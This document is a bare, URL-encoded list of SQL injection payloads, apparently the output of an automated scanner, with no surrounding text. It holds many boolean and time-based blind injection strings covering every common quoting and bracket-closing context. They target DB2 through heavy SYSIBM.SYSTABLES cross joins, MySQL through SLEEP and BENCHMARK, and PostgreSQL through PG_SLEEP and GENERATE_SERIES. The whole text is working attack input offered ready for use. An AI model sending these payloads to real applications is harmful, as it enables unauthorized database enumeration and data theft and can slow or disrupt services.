1234.5%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%288815%3D8815 1234.5%29%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%289153%3D9153 1234.5%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27xcoB%27%3D%27xcoB 1234.5%27%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27Gwnu%27%3D%27Gwnu 1234.5%27%29%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27FnzK%27%3D%27FnzK 1234.5%27%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27GgRa%27%3D%27GgRa 1234.5%27%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27VChE%27%20LIKE%20%27VChE 1234.5%27%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%27Kgkj%27%20LIKE%20%27Kgkj 1234.5%27%29%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%27QJyM%27%20LIKE%20%27QJyM 1234.5%27%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27PVSU%27%20LIKE%20%27PVSU 1234.5%22%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22SVyz%22%3D%22SVyz 1234.5%22%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22EFxU%22%3D%22EFxU 1234.5%22%29%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22MaXK%22%3D%22MaXK 1234.5%22%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22lsIu%22%3D%22lsIu 1234.5%22%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%22dqZo%22%20LIKE%20%22dqZo 1234.5%22%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%22NILO%22%20LIKE%20%22NILO 1234.5%22%29%29%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%28%28%22Krsm%22%20LIKE%20%22Krsm 1234.5%22%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%22xOvp%22%20LIKE%20%22xOvp 1234.5%29%20WHERE%205297%3D5297%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%29%20WHERE%208188%3D8188%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%20WHERE%203181%3D3181%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%22%20WHERE%206957%3D6957%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29 1234.5%27%20%7C%7C%20%28SELECT%206522%20FROM%20DUAL%20WHERE%209019%3D9019%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%209767%20WHERE%207203%3D7203%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%206605%20FROM%20DUAL%20WHERE%202411%3D2411%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29 1234.5%20%2B%20%28SELECT%202042%20WHERE%206189%3D6189%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29 1234.5%27%20%2B%20%28SELECT%20%27IEkP%27%20FROM%20DUAL%20WHERE%202068%3D2068%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27ZBiV%27%20WHERE%201711%3D1711%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%202760%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%23 1234.5%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%285810%3D5810 1234.5%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%282592%3D2592 1234.5%29%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%288222%3D8222 1234.5%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%27PCIY%27%3D%27PCIY 1234.5%27%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%27dASQ%27%3D%27dASQ 1234.5%27%29%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%27ePpA%27%3D%27ePpA 1234.5%27%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%27rTPE%27%3D%27rTPE 1234.5%27%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%27WwZl%27%20LIKE%20%27WwZl 1234.5%27%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%27uHVy%27%20LIKE%20%27uHVy 1234.5%27%29%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%27KqFC%27%20LIKE%20%27KqFC 1234.5%27%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%27bdbB%27%20LIKE%20%27bdbB 1234.5%22%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%22AqqF%22%3D%22AqqF 1234.5%22%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%22MdhY%22%3D%22MdhY 1234.5%22%29%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%22WrrU%22%3D%22WrrU 1234.5%22%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%22iwON%22%3D%22iwON 1234.5%22%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%22kRgW%22%20LIKE%20%22kRgW 1234.5%22%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%22aQVr%22%20LIKE%20%22aQVr 1234.5%22%29%29%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%28%28%28%22EEwL%22%20LIKE%20%22EEwL 1234.5%22%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20AND%20%22RcaZ%22%20LIKE%20%22RcaZ 1234.5%29%20WHERE%204006%3D4006%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20WHERE%203877%3D3877%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20WHERE%206417%3D6417%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%20WHERE%207754%3D7754%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20%7C%7C%20%28SELECT%209324%20FROM%20DUAL%20WHERE%204533%3D4533%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1234.5%27%20%7C%7C%20%28SELECT%203766%20WHERE%207433%3D7433%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%7C%7C%20%27 1234.5%20%2B%20%28SELECT%203019%20FROM%20DUAL%20WHERE%207990%3D7990%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29 1234.5%20%2B%20%28SELECT%207523%20WHERE%206685%3D6685%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29 1234.5%27%20%2B%20%28SELECT%20%27KzeA%27%20FROM%20DUAL%20WHERE%204802%3D4802%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%2B%20%27 1234.5%27%20%2B%20%28SELECT%20%27uuLa%27%20WHERE%207546%3D7546%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%29%20%2B%20%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%201069%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29--%20%23 -1841%29%20OR%202974%3DSLEEP%285%29 -1587%27%29%20OR%202974%3DSLEEP%285%29 -8169%27%20OR%202974%3DSLEEP%285%29 -7739%22%20OR%202974%3DSLEEP%285%29 -8246%29%20OR%202974%3DSLEEP%285%29%20AND%20%284891%3D4891 -7584%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%285324%3D5324 -9107%29%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%284059%3D4059 -6471%20OR%202974%3DSLEEP%285%29 -6049%27%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%27Lgfg%27%3D%27Lgfg -4573%27%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%27VvHV%27%3D%27VvHV -4679%27%29%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%28%27OOiU%27%3D%27OOiU -6419%27%20OR%202974%3DSLEEP%285%29%20AND%20%27YJrb%27%3D%27YJrb -4233%27%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%27lCiz%27%20LIKE%20%27lCiz -3949%27%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%27SZCv%27%20LIKE%20%27SZCv -5691%27%29%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%28%27MAan%27%20LIKE%20%27MAan -8391%27%20OR%202974%3DSLEEP%285%29%20AND%20%27ioZh%27%20LIKE%20%27ioZh -8076%22%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%22XtjU%22%3D%22XtjU -3498%22%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%22wNXD%22%3D%22wNXD -9221%22%29%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%28%22KiDX%22%3D%22KiDX -6276%22%20OR%202974%3DSLEEP%285%29%20AND%20%22MbuI%22%3D%22MbuI -4417%22%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%22pFzZ%22%20LIKE%20%22pFzZ -7269%22%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%22tlOs%22%20LIKE%20%22tlOs -7838%22%29%29%29%20OR%202974%3DSLEEP%285%29%20AND%20%28%28%28%22Wfro%22%20LIKE%20%22Wfro -6214%22%20OR%202974%3DSLEEP%285%29%20AND%20%22cOas%22%20LIKE%20%22cOas -7441%29%20WHERE%206909%3D6909%20OR%202974%3DSLEEP%285%29 -9783%27%29%20WHERE%202051%3D2051%20OR%202974%3DSLEEP%285%29 -7196%27%20WHERE%209716%3D9716%20OR%202974%3DSLEEP%285%29 -4966%22%20WHERE%204063%3D4063%20OR%202974%3DSLEEP%285%29 -2967%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -7677%27%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -2294%27%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -3186%22%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -7319%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%285965%3D5965 -6896%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%284867%3D4867 -8910%29%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%283720%3D3720 -3269%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -5872%27%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%27WZTJ%27%3D%27WZTJ -4975%27%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%27pCTk%27%3D%27pCTk -1538%27%29%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%28%27Miaw%27%3D%27Miaw -5333%27%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%27XAcC%27%3D%27XAcC -8592%27%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%27KPoD%27%20LIKE%20%27KPoD -6842%27%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%27WUKU%27%20LIKE%20%27WUKU -2847%27%29%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%28%27wNgE%27%20LIKE%20%27wNgE -5026%27%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%27StLr%27%20LIKE%20%27StLr -6249%22%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%22pvMG%22%3D%22pvMG -8604%22%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%22VESr%22%3D%22VESr -3790%22%29%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%28%22KvRW%22%3D%22KvRW -1861%22%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%22AmBl%22%3D%22AmBl -5332%22%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%22qFeg%22%20LIKE%20%22qFeg -5250%22%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%22IoEf%22%20LIKE%20%22IoEf -3040%22%29%29%29%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%28%28%28%22tXFx%22%20LIKE%20%22tXFx -6082%22%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29%20AND%20%22XdfP%22%20LIKE%20%22XdfP -2130%29%20WHERE%202754%3D2754%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -7868%27%29%20WHERE%207048%3D7048%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -1858%27%20WHERE%203937%3D3937%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -4359%22%20WHERE%202920%3D2920%20OR%207956%3DBENCHMARK%285000000%2CMD5%280x794b5153%29%29 -6656%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -4166%27%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -1781%27%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -5752%22%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -8232%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%288456%3D8456 -2987%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%283895%3D3895 -1488%29%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%282221%3D2221 -9268%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -3889%27%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27UUxC%27%3D%27UUxC -8311%27%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27yYvQ%27%3D%27yYvQ -3231%27%29%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27VdCv%27%3D%27VdCv -5066%27%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%27tkRL%27%3D%27tkRL -2062%27%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27Lstn%27%20LIKE%20%27Lstn -8314%27%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27fQnG%27%20LIKE%20%27fQnG -6880%27%29%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27UEJD%27%20LIKE%20%27UEJD -9035%27%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%27HbkE%27%20LIKE%20%27HbkE -8762%22%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22uRCt%22%3D%22uRCt -3226%22%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22oOAS%22%3D%22oOAS -9022%22%29%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22nCFv%22%3D%22nCFv -6621%22%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%22kZbl%22%3D%22kZbl -1106%22%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22vAPb%22%20LIKE%20%22vAPb -7856%22%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22FxyG%22%20LIKE%20%22FxyG -3410%22%29%29%29%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22eTHE%22%20LIKE%20%22eTHE -2577%22%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29%20AND%20%22sSKH%22%20LIKE%20%22sSKH -3207%29%20WHERE%206943%3D6943%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -5201%27%29%20WHERE%204511%3D4511%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -9920%27%20WHERE%205235%3D5235%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -9262%22%20WHERE%202309%3D2309%20OR%206807%3D%28SELECT%206807%20FROM%20PG_SLEEP%285%29%29 -5710%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -3097%27%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -6323%27%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -9859%22%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -9736%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%281645%3D1645 -6495%29%29%20OR%206988%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%289084%3D9084 